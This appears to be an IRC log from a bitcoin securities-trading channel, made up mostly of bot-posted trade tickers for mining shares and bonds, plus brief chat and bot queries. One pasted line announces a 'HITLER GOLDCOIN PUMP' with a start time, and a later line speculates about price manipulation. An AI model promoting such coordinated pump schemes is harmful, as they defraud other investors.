BTC [-] Aug 17 18:39:29 [BTCTC] [BASIC-MINING] 1 @ 0.28 BTC [-] Aug 17 18:39:30 [BTCTC] [BASIC-MINING] 10 @ 0.28 = 2.8 BTC [-] Aug 17 18:40:03 [BTCTC] [DMS.MINING] 200 @ 0.003389 = 0.6778 BTC [-] Aug 17 18:40:27 [BTCTC] [DMS.MINING] 500 @ 0.00339 = 1.695 BTC [+] Aug 17 18:40:42 [BTCTC] [DMS.MINING] 10 @ 0.003395 = 0.034 BTC [+] Aug 17 18:40:57 [BTCTC] [DMS.MINING] 42 @ 0.0034 = 0.1428 BTC [+] Aug 17 18:41:35 [BTCTC] [DMS.MINING] 148 @ 0.003486 = 0.5159 BTC [+] Aug 17 18:42:32 [BTCTC] [BASIC-MINING] 1 @ 0.2768 BTC [-] Aug 17 18:42:50 [BTCTC] [BASIC-MINING] 6 @ 0.271 = 1.626 BTC [-] Aug 17 18:43:30 Headless604: THE MOST EPIC HITLER GOLDCOIN PUMP IN HISTORY STARTS AT 4 PM CST / 5PM EST 8/17 Aug 17 18:44:02 [BTCTC] [DMS.SELLING] 14 @ 0.01774 = 0.2484 BTC [+] Aug 17 18:44:47 [BTCTC] [DMS.SELLING] 74 @ 0.01778 = 1.3157 BTC [+] Aug 17 18:44:48 [BTCTC] [DMS.SELLING] 18 @ 0.01778 = 0.32 BTC [+] Aug 17 18:45:38 [BTCTC] [LABCOIN] 1 @ 0.001679 BTC [+] Aug 17 18:45:43 [BTCTC] [DMS.MINING] 3 @ 0.003486 = 0.0105 BTC [+] Aug 17 18:50:37 gecko_x2 da fuck is that Aug 17 18:53:11 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.001196 = 0.006 BTC [-] Aug 17 18:54:33 lol, n/m Aug 17 18:54:40 pasted in wrong window Aug 17 18:55:51 [BTCTC] [DMS.SELLING] 20 @ 0.01744 = 0.3488 BTC [-] Aug 17 18:55:51 [BTCTC] [DMS.SELLING] 45 @ 0.01743 = 0.7844 BTC [-] Aug 17 18:56:21 no volume makes jack a dull boy :\ Aug 17 18:57:42 [BTCTC] [ACTIVEMINING] 68 @ 0.005217 = 0.3548 BTC [+] Aug 17 18:58:46 [BTCTC] [ACTIVEMINING] 15 @ 0.005214 = 0.0782 BTC [-] Aug 17 18:58:47 [BTCTC] [ACTIVEMINING] 23 @ 0.005215 = 0.1199 BTC [+] Aug 17 18:58:48 [BTCTC] [ACTIVEMINING] 3 @ 0.005217 = 0.0157 BTC [+] Aug 17 18:58:49 [BTCTC] [ACTIVEMINING] 487 @ 0.005294 = 2.5782 BTC [+] Aug 17 18:58:51 [BTCTC] [ACTIVEMINING] 716 @ 0.005295 = 3.7912 BTC [+] Aug 17 18:58:52 [BTCTC] [ACTIVEMINING] 1259 @ 0.005296 = 6.6677 BTC [+] Aug 17 18:59:17 [BTCTC] [ACTIVEMINING] 6 @ 0.005295 = 0.0318 BTC [-] Aug 17 18:59:19 [BTCTC] [ACTIVEMINING] 133 @ 0.005296 = 0.7044 BTC [+] Aug 17 18:59:20 [BTCTC] [ACTIVEMINING] 329 @ 0.005298 = 1.743 BTC [+] Aug 17 18:59:21 [BTCTC] [ACTIVEMINING] 404 @ 0.005299 = 2.1408 BTC [+] Aug 17 18:59:21 [BTCTC] [ACTIVEMINING] 2300 @ 0.0053 = 12.19 BTC [+] Aug 17 19:00:00 [BTCTC] [ACTIVEMINING] 6 @ 0.005303 = 0.0318 BTC [+] Aug 17 19:00:01 [BTCTC] [ACTIVEMINING] 11 @ 0.005304 = 0.0583 BTC [+] Aug 17 19:00:03 [BTCTC] [ACTIVEMINING] 55 @ 0.005305 = 0.2918 BTC [+] Aug 17 19:00:04 [BTCTC] [ACTIVEMINING] 60 @ 0.005399 = 0.3239 BTC [+] Aug 17 19:00:05 [BTCTC] [ACTIVEMINING] 100 @ 0.0054 = 0.54 BTC [+] Aug 17 19:00:06 [BTCTC] [ACTIVEMINING] 200 @ 0.005404 = 1.0808 BTC [+] Aug 17 19:00:07 [BTCTC] [ACTIVEMINING] 76 @ 0.005479 = 0.4164 BTC [+] Aug 17 19:00:08 [BTCTC] [ACTIVEMINING] 380 @ 0.00548 = 2.0824 BTC [+] Aug 17 19:00:09 [BTCTC] [ACTIVEMINING] 300 @ 0.005497 = 1.6491 BTC [+] Aug 17 19:00:10 [BTCTC] [ACTIVEMINING] 100 @ 0.005498 = 0.5498 BTC [+] Aug 17 19:00:11 [BTCTC] [ACTIVEMINING] 1000 @ 0.0055 = 5.5 BTC [+] Aug 17 19:00:16 [BTCTC] [ACTIVEMINING] 50 @ 0.0055 = 0.275 BTC [+] Aug 17 19:01:31 [BTCTC] [ACTIVEMINING] 1127 @ 0.005504 = 6.203 BTC [+] Aug 17 19:01:32 [BTCTC] [ACTIVEMINING] 200 @ 0.00557 = 1.114 BTC [+] Aug 17 19:01:34 [BTCTC] [ACTIVEMINING] 119 @ 0.00558 = 0.664 BTC [+] Aug 17 19:01:36 [BTCTC] [ACTIVEMINING] 135 @ 0.005585 = 0.754 BTC [+] Aug 17 19:02:35 [BTCTC] [ACTIVEMINING] 50 @ 0.005588 = 0.2794 BTC [+] Aug 17 19:02:36 [BTCTC] [ACTIVEMINING] 5558 @ 0.005589 = 31.0637 BTC [+] Aug 17 19:02:38 [BTCTC] [ACTIVEMINING] 100 @ 0.0056 = 0.56 BTC [+] Aug 17 19:02:39 [BTCTC] [ACTIVEMINING] 100 @ 0.005681 = 0.5681 BTC [+] Aug 17 19:02:41 [BTCTC] [ACTIVEMINING] 100 @ 0.005751 = 0.5751 BTC [+] Aug 17 19:02:45 [BTCTC] [ACTIVEMINING] 8 @ 0.005799 = 0.0464 BTC [+] Aug 17 19:02:46 [BTCTC] [ACTIVEMINING] 100 @ 0.0058 = 0.58 BTC [+] Aug 17 19:02:47 [BTCTC] [ACTIVEMINING] 675 @ 0.005815 = 3.9251 BTC [+] Aug 17 19:02:49 [BTCTC] [ACTIVEMINING] 8160 @ 0.00582 = 47.4912 BTC [+] Aug 17 19:02:51 [BTCTC] [ACTIVEMINING] 1000 @ 0.00583 = 5.83 BTC [+] Aug 17 19:02:52 [BTCTC] [ACTIVEMINING] 149 @ 0.005838 = 0.8699 BTC [+] Aug 17 19:03:01 [BTCTC] [LABCOIN] 15 @ 0.001677 = 0.0252 BTC [-] Aug 17 19:03:02 [BTCTC] [LABCOIN] 85 @ 0.001678 = 0.1426 BTC [+] Aug 17 19:03:23 [BTCTC] [ACTIVEMINING] 351 @ 0.005838 = 2.0491 BTC [+] Aug 17 19:03:24 [BTCTC] [ACTIVEMINING] 100 @ 0.005841 = 0.5841 BTC [+] Aug 17 19:03:25 [BTCTC] [ACTIVEMINING] 117 @ 0.005845 = 0.6839 BTC [+] Aug 17 19:03:27 [BTCTC] [ACTIVEMINING] 432 @ 0.005845 = 2.525 BTC [+] Aug 17 19:03:59 [BTCTC] [ACTIVEMINING] 9 @ 0.005845 = 0.0526 BTC [+] Aug 17 19:04:14 Well. There is some volume for ya Aug 17 19:04:37 [BTCTC] [ACTIVEMINING] 559 @ 0.005845 = 3.2674 BTC [+] Aug 17 19:04:40 [BTCTC] [ACTIVEMINING] 100 @ 0.005857 = 0.5857 BTC [+] Aug 17 19:04:43 [BTCTC] [ACTIVEMINING] 777 @ 0.005888 = 4.575 BTC [+] Aug 17 19:04:44 [BTCTC] [ACTIVEMINING] 50 @ 0.005899 = 0.295 BTC [+] Aug 17 19:04:46 [BTCTC] [ACTIVEMINING] 340 @ 0.0059 = 2.006 BTC [+] Aug 17 19:04:47 [BTCTC] [ACTIVEMINING] 35 @ 0.0059 = 0.2065 BTC [+] Aug 17 19:04:48 [BTCTC] [ACTIVEMINING] 50 @ 0.0059 = 0.295 BTC [+] Aug 17 19:12:20 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.00114 = 0.114 BTC [-] Aug 17 19:12:22 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.001139 = 0.0023 BTC [-] Aug 17 19:12:23 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.001109 BTC [-] Aug 17 19:13:54 [BTCTC] [DMS.PURCHASE] 6 @ 0.02074 = 0.1244 BTC [-] Aug 17 19:16:28 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.001194 = 0.0119 BTC [+] Aug 17 19:19:10 [BTCTC] [DMS.MINING] 24 @ 0.003486 = 0.0837 BTC [+] Aug 17 19:20:05 [BTCTC] [TAT.ASICMINER] 14 @ 0.0383 = 0.5362 BTC [-] Aug 17 19:20:44 [BTCTC] [TAT.ASICMINER] 15 @ 0.0382 = 0.573 BTC [-] Aug 17 19:21:33 [BTCTC] [DMS.MINING] 207 @ 0.003486 = 0.7216 BTC [+] Aug 17 19:21:34 [BTCTC] [DMS.MINING] 8 @ 0.003486 = 0.0279 BTC [+] Aug 17 19:22:19 [BTCTC] [DMS.MINING] 500 @ 0.00353 = 1.765 BTC [+] Aug 17 19:23:14 [BTCTC] [PAJKA.BOND] 5 @ 0.0159 = 0.0795 BTC [+] Aug 17 19:23:46 [BTCTC] [PAJKA.BOND] 30 @ 0.016 = 0.48 BTC [+] Aug 17 19:24:21 [BTCTC] [PAJKA.BOND] 3 @ 0.017 = 0.051 BTC [+] Aug 17 19:25:26 [BTCTC] [DMS.MINING] 17 @ 0.003499 = 0.0595 BTC [-] Aug 17 19:26:25 [BTCTC] [DMS.MINING] 367 @ 0.00353 = 1.2955 BTC [+] Aug 17 19:26:58 [BTCTC] [DMS.MINING] 1 @ 0.00353 BTC [+] Aug 17 19:32:20 [BTCTC] [ACTIVEMINING] 4 @ 0.005819 = 0.0233 BTC [-] Aug 17 19:44:50 [BTCTC] [DMS.MINING] 4 @ 0.00353 = 0.0141 BTC [+] Aug 17 19:46:05 [HAVELOCK] [VTX] 3 @ 0.6 = 1.8 BTC [-] Aug 17 19:47:33 [BTCTC] [DMS.SELLING] 655 @ 0.01738 = 11.3839 BTC [-] Aug 17 19:47:57 [BTCTC] [DMS.SELLING] 10 @ 0.01737 = 0.1737 BTC [-] Aug 17 19:47:59 [BTCTC] [DMS.SELLING] 48 @ 0.01736 = 0.8333 BTC [-] Aug 17 19:47:59 [BTCTC] [DMS.SELLING] 308 @ 0.01735 = 5.3438 BTC [-] Aug 17 19:53:01 [BTCTC] [ACTIVEMINING] 30 @ 0.005637 = 0.1691 BTC [-] Aug 17 19:53:03 [BTCTC] [ACTIVEMINING] 38 @ 0.005636 = 0.2142 BTC [-] Aug 17 19:53:20 [BTCTC] [ACTIVEMINING] 30 @ 0.005639 = 0.1692 BTC [+] Aug 17 19:53:51 [BTCTC] [ACTIVEMINING] 30 @ 0.005641 = 0.1692 BTC [+] Aug 17 19:53:53 [BTCTC] [ACTIVEMINING] 38 @ 0.00564 = 0.2143 BTC [-] Aug 17 19:55:01 [BTCTC] [DMS.MINING] 28 @ 0.00353 = 0.0988 BTC [+] Aug 17 19:55:02 [BTCTC] [DMS.MINING] 1 @ 0.00353 BTC [+] Aug 17 19:55:26 [BTCTC] [DMS.MINING] 40 @ 0.00355 = 0.142 BTC [+] Aug 17 19:56:03 [BTCTC] [DMS.MINING] 39 @ 0.003589 = 0.14 BTC [+] Aug 17 19:56:40 [BTCTC] [DMS.PURCHASE] 65 @ 0.02074 = 1.3481 BTC [-] Aug 17 19:59:11 [BTCTC] [ACTIVEMINING] 68 @ 0.00566 = 0.3849 BTC [+] Aug 17 20:01:25 [MPEX] [S.MPOE] 16250 @ 0.00083618 = 13.5879 BTC [+] Aug 17 20:02:06 [BTCTC] [DMS.MINING] 1 @ 0.003589 BTC [+] Aug 17 20:05:18 [BTCTC] [ACTIVEMINING] 30 @ 0.005683 = 0.1705 BTC [+] Aug 17 20:07:00 [BTCTC] [ACTIVEMINING] 30 @ 0.005683 = 0.1705 BTC [+] Aug 17 20:08:03 [BTCTC] [ACTIVEMINING] 30 @ 0.005681 = 0.1704 BTC [-] Aug 17 20:08:15 [BTCTC] [DMS.MINING] 1 @ 0.003589 BTC [+] Aug 17 20:10:20 [BTCTC] [TAT.ASICMINER] 20 @ 0.0384 = 0.768 BTC [+] Aug 17 20:12:07 [BTCTC] [ACTIVEMINING] 31 @ 0.005603 = 0.1737 BTC [-] Aug 17 20:21:32 [BTCTC] [DMS.MINING] 40 @ 0.003522 = 0.1409 BTC [-] Aug 17 20:21:34 [BTCTC] [DMS.MINING] 5 @ 0.003589 = 0.0179 BTC [+] Aug 17 20:22:05 [HAVELOCK] [AM100] 25 @ 0.038 = 0.95 BTC [+] Aug 17 20:24:06 [HAVELOCK] [AM100] 3 @ 0.0375001 = 0.1125 BTC [-] Aug 17 20:26:48 [BTCTC] [DMS.SELLING] 1 @ 0.01777 BTC [+] Aug 17 20:27:18 [BTCTC] [DMS.PURCHASE] 1 @ 0.02074 BTC [-] Aug 17 20:29:05 [BTCTC] [BTC-TRADING-PT] 8 @ 0.89 = 7.12 BTC [-] Aug 17 20:30:12 [BTCTC] [TAT.VIRTUALMINE] 706 @ 0.001187 = 0.838 BTC [-] Aug 17 20:30:25 [BTCTC] [LABCOIN] 1 @ 0.001652 BTC [-] Aug 17 20:31:02 [BTCTC] [TAT.VIRTUALMINE] 124 @ 0.001188 = 0.1473 BTC [+] Aug 17 20:31:03 [BTCTC] [TAT.VIRTUALMINE] 12 @ 0.001189 = 0.0143 BTC [+] Aug 17 20:31:38 [BTCTC] [KENILWORTH] 1 @ 0.001593 BTC [-] Aug 17 20:31:52 [BTCTC] [TAT.MINIGAME] 100 @ 0.00027 = 0.027 BTC [-] Aug 17 20:31:53 [BTCTC] [TAT.MINIGAME] 500 @ 0.000271 = 0.1355 BTC [+] Aug 17 20:31:54 [BTCTC] [TAT.MINIGAME] 435 @ 0.000273 = 0.1188 BTC [+] Aug 17 20:32:37 [BTCTC] [B.YABMC] 10 @ 0.002749 = 0.0275 BTC [+] Aug 17 20:32:39 [BTCTC] [B.YABMC] 25 @ 0.002749 = 0.0687 BTC [+] Aug 17 20:32:40 [BTCTC] [B.YABMC] 65 @ 0.00275 = 0.1788 BTC [+] Aug 17 20:34:20 [BTCTC] [LABCOIN] 30 @ 0.001656 = 0.0497 BTC [+] Aug 17 20:35:58 [BTCTC] [TAT.ASICMINER] 1 @ 0.0384 BTC [+] Aug 17 20:36:14 [BTCTC] [LABCOIN] 30 @ 0.001656 = 0.0497 BTC [+] Aug 17 20:36:55 [BTCTC] [LABCOIN] 30 @ 0.001656 = 0.0497 BTC [+] Aug 17 20:37:26 [BTCTC] [ACTIVEMINING] 5 @ 0.005603 = 0.028 BTC [-] Aug 17 20:37:27 [BTCTC] [ACTIVEMINING] 100 @ 0.005602 = 0.5602 BTC [-] Aug 17 20:37:36 [BTCTC] [LABCOIN] 20 @ 0.001656 = 0.0331 BTC [+] Aug 17 20:37:50 [BTCTC] [ACTIVEMINING] 22 @ 0.0056 = 0.1232 BTC [-] Aug 17 20:38:31 [BTCTC] [LABCOIN] 30 @ 0.001652 = 0.0496 BTC [-] Aug 17 20:39:15 [BTCTC] [LABCOIN] 30 @ 0.001652 = 0.0496 BTC [-] Aug 17 20:39:55 [BTCTC] [KENILWORTH] 1 @ 0.001796 BTC [+] Aug 17 20:41:31 Didn't kenilworth go under? Aug 17 20:41:35 [BTCTC] [DMS.MINING] 54 @ 0.003589 = 0.1938 BTC [+] Aug 17 20:41:36 [BTCTC] [DMS.MINING] 1 @ 0.003589 BTC [+] Aug 17 20:41:37 [BTCTC] [DMS.MINING] 15 @ 0.0036 = 0.054 BTC [+] Aug 17 20:42:06 [BTCTC] [LABCOIN] 300 @ 0.001651 = 0.4953 BTC [-] Aug 17 20:42:34 [BTCTC] [LABCOIN] 1835 @ 0.00165 = 3.0278 BTC [-] Aug 17 20:45:26 [MPEX] [S.MPOE] 1900 @ 0.00083383 = 1.5843 BTC [-] Aug 17 20:45:28 [MPEX] [S.MPOE] 6700 @ 0.00083641 = 5.6039 BTC [+] Aug 17 20:45:29 [MPEX] [S.MPOE] 9264 @ 0.00083754 = 7.759 BTC [+] Aug 17 20:51:02 when that ? Aug 17 20:55:30 i thought kenilworth was always down under :> Aug 17 20:55:46 [BTCTC] [NASTY-PT] 1 @ 0.00399 BTC [-] Aug 17 20:56:02 [BTCTC] [NASTY-PT] 3 @ 0.00367 = 0.011 BTC [-] Aug 17 20:56:04 [BTCTC] [NASTY-PT] 100 @ 0.00366 = 0.366 BTC [-] Aug 17 20:56:05 [BTCTC] [NASTY-PT] 46 @ 0.003659 = 0.1683 BTC [-] Aug 17 20:57:40 lol Aug 17 20:58:29 [BTCTC] [LABCOIN] 5 @ 0.001632 = 0.0082 BTC [-] Aug 17 20:58:53 [BTCTC] [LABCOIN] 2 @ 0.001632 = 0.0033 BTC [-] Aug 17 20:59:55 [BTCTC] [BITVPS] 1 @ 0.002979 BTC [+] Aug 17 21:00:01 will labcoin have a rally following mondays news? Aug 17 21:00:17 [BTCTC] [DMS.MINING] 2 @ 0.00358 = 0.0072 BTC [-] Aug 17 21:02:07 what news is thatg ? Aug 17 21:03:01 someone successfully manipulated actm with a one line post? Aug 17 21:03:48 https://bitcointalk.org/index.php?topic=254930.msg2951748#msg2951748 Aug 17 21:03:52 [BTCTC] [LABCOIN] 1 @ 0.001651 BTC [+] Aug 17 21:03:54 ActiveMining Overview and Speculation Thread Aug 17 21:04:45 test chip batch from factory received, chips working.. ordering full batch Aug 17 21:06:00 that would be good news Aug 17 21:06:05 wow I look away for a couple of weeks.. and shit.. I don't even recognize this place Aug 17 21:06:12 [BTCTC] [LABCOIN] 1 @ 0.001652 BTC [+] Aug 17 21:06:13 [BTCTC] [LABCOIN] 3 @ 0.001653 = 0.005 BTC [+] Aug 17 21:09:39 [BTCTC] [KENILWORTH] 24 @ 0.001797 = 0.0431 BTC [+] Aug 17 21:11:09 [BTCTC] [LABCOIN] 9 @ 0.001663 = 0.015 BTC [+] Aug 17 21:12:07 [BTCTC] [ACTIVEMINING] 1 @ 0.005474 BTC [-] Aug 17 21:13:35 [BTCTC] [TAT.ASICMINER] 29 @ 0.0382 = 1.1078 BTC [-] Aug 17 21:14:49 [BTCTC] [TAT.ASICMINER] 13 @ 0.03806 = 0.4948 BTC [-] Aug 17 21:14:50 [BTCTC] [TAT.ASICMINER] 1 @ 0.03806 BTC [-] Aug 17 21:14:52 [BTCTC] [TAT.ASICMINER] 5 @ 0.03806 = 0.1903 BTC [-] Aug 17 21:14:53 [BTCTC] [TAT.ASICMINER] 11 @ 0.03805 = 0.4186 BTC [-] Aug 17 21:14:54 [BTCTC] [TAT.ASICMINER] 10 @ 0.03801 = 0.3801 BTC [-] Aug 17 21:14:55 [BTCTC] [TAT.ASICMINER] 1 @ 0.038 BTC [-] Aug 17 21:14:57 [BTCTC] [TAT.ASICMINER] 2 @ 0.038 = 0.076 BTC [-] Aug 17 21:14:58 [BTCTC] [TAT.ASICMINER] 10 @ 0.038 = 0.38 BTC [-] Aug 17 21:14:59 [BTCTC] [TAT.ASICMINER] 20 @ 0.038 = 0.76 BTC [-] Aug 17 21:15:00 [BTCTC] [TAT.ASICMINER] 7 @ 0.038 = 0.266 BTC [-] Aug 17 21:15:00 [BTCTC] [TAT.ASICMINER] 1 @ 0.038 BTC [-] Aug 17 21:15:01 [BTCTC] [TAT.ASICMINER] 40 @ 0.038 = 1.52 BTC [-] Aug 17 21:15:03 [BTCTC] [TAT.ASICMINER] 27 @ 0.038 = 1.026 BTC [-] Aug 17 21:15:04 [BTCTC] [TAT.ASICMINER] 1 @ 0.038 BTC [-] Aug 17 21:16:31 [BTCTC] [DMS.PURCHASE] 2 @ 0.02074 = 0.0415 BTC [-] Aug 17 21:16:55 [MPEX] [S.MPOE] 8653 @ 0.00083754 = 7.2472 BTC [+] Aug 17 21:17:44 [BTCTC] [BITVPS] 1 @ 0.002979 BTC [+] Aug 17 21:17:59 [BTCTC] [BITVPS] 3 @ 0.002979 = 0.0089 BTC [+] Aug 17 21:19:26 [BTCTC] [TAT.ASICMINER] 4 @ 0.03799 = 0.152 BTC [-] Aug 17 21:19:28 [BTCTC] [TAT.ASICMINER] 1 @ 0.0379 BTC [-] Aug 17 21:19:29 [BTCTC] [TAT.ASICMINER] 15 @ 0.03788 = 0.5682 BTC [-] Aug 17 21:26:32 [BTCTC] [BTC-BOND] 8 @ 0.009995 = 0.08 BTC [+] Aug 17 21:27:21 .d Aug 17 21:27:22 50810339.04828 | Next Diff in 1334 blocks | Estimated Change: 18.1423% in 7d 13h 54m 11s Aug 17 21:27:27 ;;nethash Aug 17 21:27:28 459049.83314 Aug 17 21:27:54 [BTCTC] [BTC-BOND] 5 @ 0.009996 = 0.05 BTC [+] Aug 17 21:30:22 [BTCTC] [ASICMINER-PT] 1 @ 3.87 BTC [-] Aug 17 21:30:23 [BTCTC] [ASICMINER-PT] 1 @ 3.87 BTC [-] Aug 17 21:30:24 [BTCTC] [ASICMINER-PT] 1 @ 3.85 BTC [-] Aug 17 21:30:25 [BTCTC] [ASICMINER-PT] 4 @ 3.85 = 15.4 BTC [-] Aug 17 21:36:24 [BTCTC] [ACTIVEMINING] 1 @ 0.00527 BTC [-] Aug 17 21:36:25 [BTCTC] [ACTIVEMINING] 49 @ 0.005269 = 0.2582 BTC [-] Aug 17 21:37:02 [BTCTC] [ACTIVEMINING] 1 @ 0.005269 BTC [-] Aug 17 21:37:03 [BTCTC] [ACTIVEMINING] 124 @ 0.005265 = 0.6529 BTC [-] Aug 17 21:37:05 [BTCTC] [ACTIVEMINING] 375 @ 0.00525 = 1.9688 BTC [-] Aug 17 21:47:42 [BTCTC] [ACTIVEMINING] 7 @ 0.005251 = 0.0368 BTC [+] Aug 17 21:47:43 [BTCTC] [ACTIVEMINING] 50 @ 0.0052 = 0.26 BTC [-] Aug 17 21:47:54 [BTCTC] [ACTIVEMINING] 50 @ 0.005178 = 0.2589 BTC [-] Aug 17 21:50:12 [BTCTC] [ACTIVEMINING] 15 @ 0.005178 = 0.0777 BTC [-] Aug 17 22:01:38 [HAVELOCK] [VTX] 5 @ 0.6 = 3 BTC [-] Aug 17 22:04:10 [HAVELOCK] [VTX] 5 @ 0.6 = 3 BTC [-] Aug 17 22:05:36 [BTCTC] [ACTIVEMINING] 111 @ 0.005178 = 0.5748 BTC [-] Aug 17 22:10:18 [HAVELOCK] [XBOND] 1 @ 0.0011 BTC [+] Aug 17 22:13:36 [BTCTC] [ACTIVEMINING] 62 @ 0.005178 = 0.321 BTC [-] Aug 17 22:15:10 [BTCTC] [ACTIVEMINING] 50 @ 0.005178 = 0.2589 BTC [-] Aug 17 22:15:24 [BTCTC] [ACTIVEMINING] 18 @ 0.005178 = 0.0932 BTC [-] Aug 17 22:16:45 [BTCTC] [BTC-BOND] 5 @ 0.009996 = 0.05 BTC [+] Aug 17 22:18:01 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1989 BTC [+] Aug 17 22:19:25 [BTCTC] [ACTIVEMINING] 50 @ 0.005178 = 0.2589 BTC [-] Aug 17 22:27:29 [BTCTC] [ACTIVEMINING] 2 @ 0.005178 = 0.0104 BTC [-] Aug 17 22:29:32 [HAVELOCK] [AM100] 1 @ 0.0383 BTC [+] Aug 17 22:32:17 [BTCTC] [ACTIVEMINING] 40 @ 0.005178 = 0.2071 BTC [-] Aug 17 22:32:43 [BTCTC] [ACTIVEMINING] 2 @ 0.005178 = 0.0104 BTC [-] Aug 17 22:32:56 [BTCTC] [ACTIVEMINING] 4383 @ 0.005178 = 22.6952 BTC [-] Aug 17 22:37:38 [BTCTC] [ACTIVEMINING] 19 @ 0.0052 = 0.0988 BTC [+] Aug 17 22:38:53 [BTCTC] [ACTIVEMINING] 3 @ 0.005171 = 0.0155 BTC [-] Aug 17 22:40:50 [BTCTC] [ACTIVEMINING] 11 @ 0.005171 = 0.0569 BTC [-] Aug 17 22:40:51 [BTCTC] [ACTIVEMINING] 15 @ 0.00517 = 0.0776 BTC [-] Aug 17 22:41:28 [BTCTC] [TAT.ASICMINER] 2 @ 0.0383 = 0.0766 BTC [+] Aug 17 22:43:01 [HAVELOCK] [VTX] 2 @ 0.6 = 1.2 BTC [-] Aug 17 22:45:32 [HAVELOCK] [VTX] 1 @ 0.59002 BTC [-] Aug 17 22:51:49 [BTCTC] [TAT.ASICMINER] 10 @ 0.03788 = 0.3788 BTC [-] Aug 17 22:52:30 [BTCTC] [ASICMINER-PT] 4 @ 3.86 = 15.44 BTC [+] Aug 17 22:53:09 [HAVELOCK] [XBOND] 11 @ 0.0010725 = 0.0118 BTC [-] Aug 17 22:54:34 [BTCTC] [BASIC-MINING] 4 @ 0.273 = 1.092 BTC [+] Aug 17 22:55:09 [HAVELOCK] [XBOND] 1989 @ 0.00107 = 2.1282 BTC [-] Aug 17 22:55:41 [BTCTC] [TAT.ASICMINER] 2 @ 0.0383 = 0.0766 BTC [+] Aug 17 22:55:43 [BTCTC] [TAT.ASICMINER] 1 @ 0.0383 BTC [+] Aug 17 22:57:58 [BTCTC] [TAT.ASICMINER] 16 @ 0.03788 = 0.6061 BTC [-] Aug 17 22:58:00 [BTCTC] [TAT.ASICMINER] 4 @ 0.03783 = 0.1513 BTC [-] Aug 17 22:59:13 [BTCTC] [ACTIVEMINING] 15 @ 0.005164 = 0.0775 BTC [-] Aug 17 23:00:25 [BTCTC] [CB.IDIFF-O] 20 @ 0.009749 = 0.195 BTC [+] Aug 17 23:01:41 [HAVELOCK] [AM100] 1 @ 0.0377 BTC [-] Aug 17 23:03:01 [BTCTC] [ACTIVEMINING] 3 @ 0.005165 = 0.0155 BTC [+] Aug 17 23:04:15 [HAVELOCK] [XBOND] 500 @ 0.00107 = 0.535 BTC [-] Aug 17 23:06:49 [HAVELOCK] [XBOND] 372 @ 0.00107 = 0.398 BTC [-] Aug 17 23:11:03 [HAVELOCK] [AM100] 1 @ 0.0376 BTC [-] Aug 17 23:11:31 [BTCTC] [CRYPTO-TRADE] 1 @ 0.199 BTC [+] Aug 17 23:13:53 [BTCTC] [ACTIVEMINING] 8 @ 0.005165 = 0.0413 BTC [+] Aug 17 23:14:07 .d Aug 17 23:14:07 50810339.04828 | Next Diff in 1325 blocks | Estimated Change: 18.0289% in 7d 12h 30m 36s Aug 17 23:14:10 ;;nethash Aug 17 23:14:11 458875.36788 Aug 17 23:15:38 [BTCTC] [BTC-TRADING-PT] 1 @ 0.9436 BTC [+] Aug 17 23:15:50 [BTCTC] [LABCOIN] 20 @ 0.001632 = 0.0326 BTC [-] Aug 17 23:16:28 [BTCTC] [BASIC-MINING] 1 @ 0.273 BTC [+] Aug 17 23:17:55 [BTCTC] [BTC-GROWTH] 2 @ 0.1021 = 0.2042 BTC [-] Aug 17 23:17:55 [BTCTC] [BTC-GROWTH] 2 @ 0.102 = 0.204 BTC [-] Aug 17 23:17:57 [BTCTC] [BTC-GROWTH] 35 @ 0.1019 = 3.5665 BTC [-] Aug 17 23:17:58 [BTCTC] [BTC-GROWTH] 10 @ 0.1018 = 1.018 BTC [-] Aug 17 23:17:59 [BTCTC] [BTC-GROWTH] 11 @ 0.1018 = 1.1198 BTC [-] Aug 17 23:19:39 [HAVELOCK] [AM1] 1 @ 3.9498 BTC [-] Aug 17 23:20:16 [BTCTC] [BTC-GROWTH] 62 @ 0.1018 = 6.3116 BTC [-] Aug 17 23:20:18 [BTCTC] [BTC-GROWTH] 38 @ 0.1017 = 3.8646 BTC [-] Aug 17 23:21:07 [BTCTC] [DMS.PURCHASE] 1 @ 0.02074 BTC [-] Aug 17 23:22:39 [BTCTC] [NASTY-PT] 1 @ 0.00399 BTC [+] Aug 17 23:23:38 [HAVELOCK] [AM100] 5 @ 0.0384 = 0.192 BTC [+] Aug 17 23:23:45 [BTCTC] [B.YABMC] 1 @ 0.00275 BTC [+] Aug 17 23:29:10 [HAVELOCK] [AM100] 1 @ 0.0384 BTC [+] Aug 17 23:31:11 [HAVELOCK] [AM100] 1 @ 0.03760001 BTC [-] Aug 17 23:32:14 [BTCTC] [BASIC-MINING] 1 @ 0.2899 BTC [+] Aug 17 23:33:12 [HAVELOCK] [AM100] 13 @ 0.0375001 = 0.4875 BTC [-] Aug 17 23:33:15 [BTCTC] [BASIC-MINING] 6 @ 0.29 = 1.74 BTC [+] Aug 17 23:34:12 [BTCTC] [BTC-BOND] 34 @ 0.009996 = 0.3399 BTC [+] Aug 17 23:34:44 [BTCTC] [ACTIVEMINING] 2 @ 0.005165 = 0.0103 BTC [+] Aug 17 23:37:34 !ticker m s.mpoe Aug 17 23:37:35 [MPEX:S.MPOE] 1D: 0.00081985 / 0.00083549 / 0.00083958 (194345 shares, 162.37 BTC), 7D: 0.0008191 / 0.00083994 / 0.00086987 (1976023 shares, 1,659.74 BTC), 30D: 0.0007725 / 0.00081618 / 0.0009357 (9392900 shares, 7,666.38 BTC) Aug 17 23:37:42 !last s.mpoe Aug 17 23:37:42 It says some pelt-wearin' trapper, some stinkin' bean-suckin' possum skinner, he's gonna collect that reward money. Aug 17 23:37:47 !last m s.mpoe Aug 17 23:37:48 Last trade for S.MPOE on MPEX was at 0.00083754 BTC [+] Aug 17 23:40:17 [BTCTC] [DMS.SELLING] 9 @ 0.0174 = 0.1566 BTC [-] Aug 17 23:40:33 [BTCTC] [DMS.MINING] 9 @ 0.003491 = 0.0314 BTC [-] Aug 17 23:40:40 [BTCTC] [DMS.PURCHASE] 9 @ 0.02074 = 0.1867 BTC [-] Aug 17 23:42:46 [HAVELOCK] [AM100] 5 @ 0.0376 = 0.188 BTC [+] Aug 17 23:44:47 [HAVELOCK] [AM100] 12 @ 0.0375002 = 0.45 BTC [-] Aug 17 23:45:19 [BTCTC] [ACTIVEMINING] 3 @ 0.005165 = 0.0155 BTC [+] Aug 17 23:46:15 [BTCTC] [ASICMINER-PT] 1 